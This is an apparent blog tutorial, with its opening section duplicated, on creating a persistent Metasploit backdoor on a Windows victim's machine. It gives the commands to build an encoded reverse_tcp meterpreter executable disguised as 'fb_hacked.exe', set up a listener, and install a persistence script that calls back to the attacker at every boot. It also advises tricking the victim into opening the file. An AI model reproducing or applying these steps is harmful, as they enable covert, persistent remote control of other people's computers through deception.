HOW TO CREATE A BACKDOOR WITH METASPLOIT
Hello guys in this tutorial I will show you how to create a backdoor with metasploit , before going to this tutorial let me explain little bit about Persistent. Actually Guys Metasploit contain two types of backdoors one is Persistent and the another is Metsvc. Here I am using Persistent to create a backdoor in victim system i.e my victim system is windows. Actually Persistent is used to create a backdoor which twice to connect back to the attacker metasploit instance and it would connect back to happen at system boot or user log on.You can also configure the time between different connect back attempt in case the currently the attacker machine is not up and you want the backdoor to keep trying to connect you. Now how its work, under the hood of Persistent creates a vbs script on the victim system and it save to appropriate registry to autorun. This is all about backdoor with Persistent now look out how it done…
Step 1 :- Here I am using backtrack5r3 which is a attacker System now we used to open a console and write the following codes to create a exploit here my exploit name is fb_hacked.exe.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.124.130 R | msfencode -t exe -c 16 >fb_hacked.exe
Open console and write msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
(Here PAYLOAD mean the code or exploit which is actually runs on the victim machine after exploitation and “windows” is used to refer the victim machine or meterpreter is used to open the meterpreter session of windows and reverse_tcp is use to connect back to attacker machine to victim machine)
set LHOST 192.168.124.130 (this is a backtrack ip address which is a attacker machine, you can use ifconfig command to see the ip address in backtrack)
set LPORT 4444
exploit
HOW TO CREATE A BACKDOOR WITH METASPLOIT
Hello guys in this tutorial I will show you how to create a backdoor with metasploit , before going to this tutorial let me explain little bit about Persistent. Actually Guys Metasploit contain two types of backdoors one is Persistent and the another is Metsvc. Here I am using Persistent to create a backdoor in victim system i.e my victim system is windows. Actually Persistent is used to create a backdoor which twice to connect back to the attacker metasploit instance and it would connect back to happen at system boot or user log on.You can also configure the time between different connect back attempt in case the currently the attacker machine is not up and you want the backdoor to keep trying to connect you. Now how its work, under the hood of Persistent creates a vbs script on the victim system and it save to appropriate registry to autorun. This is all about backdoor with Persistent now look out how it done…
Step 1 :- Here I am using backtrack5r3 which is a attacker System now we used to open a console and write the following codes to create a exploit here my exploit name is fb_hacked.exe.
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.124.130 R | msfencode -t exe -c 16 >fb_hacked.exe
Now the exploit is ready in the root directory which is successfully encoded.
Step 2 :- Now we try to enter into msfconsole console, for that
Open console and write msfconsole
Step 3 :- Then we try to set some setting on msfconsole using following commands
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
(Here PAYLOAD mean the code or exploit which is actually runs on the victim machine after exploitation and “windows” is used to refer the victim machine or meterpreter is used to open the meterpreter session of windows and reverse_tcp is use to connect back to attacker machine to victim machine)
set LHOST 192.168.124.130 (this is a backtrack ip address which is a attacker machine, you can use ifconfig command to see the ip address in backtrack)
set LPORT 4444
exploit
Step 3 :- In above screen shot we run the exploit and wait for the victim to click on exploit. Now we copy that exploit and send to the victim and request him/her to open that exploit.
Now when a victim click on fb_hacked exploit after that the exploit is run on the victim machine with full permission, after that we successfully exploit the victim machine and we got the meterpreater session of victim machine is open.
run persistence –A –L c:\\ -X –i 10 –p 443 –r 192.168.124.130
(here –A mean automatic start matching multi/handler to connect to the agent the second is –L is used to locate the Payload where the vb script is located.By default it would be keep in C:\ drive . The –X refer the agent automatically starts when the victim system is boot and -i 10 refer the no. of second to wait between each connect attempted, -p 443 indicates the port on which the metasploit will be listening and the ip on which the attacker machine is running which 192.168.124.130
Which is allow to uninstall or delete this backdoor at a later time.
Now we can noticed it just connected back to give a new meterpreater sessions and if I make these meterpreater session background using background command. Then we actually found 2 or 3 meterpreater session currently waiting for us.
And here sessions 3 is the new one which is created by the persistent.
Background
sessions –i 3
Here we see when the system is restart and the pervious sessions is closed i.e session 3 and after restart the system the persistent backdoor is again connected back to us after the system reboot and open a new session i.e session 4 to connect the attacker machine. Now we have a new meterpreter session which is comfortably connect using session command
sessions –i 4
No comments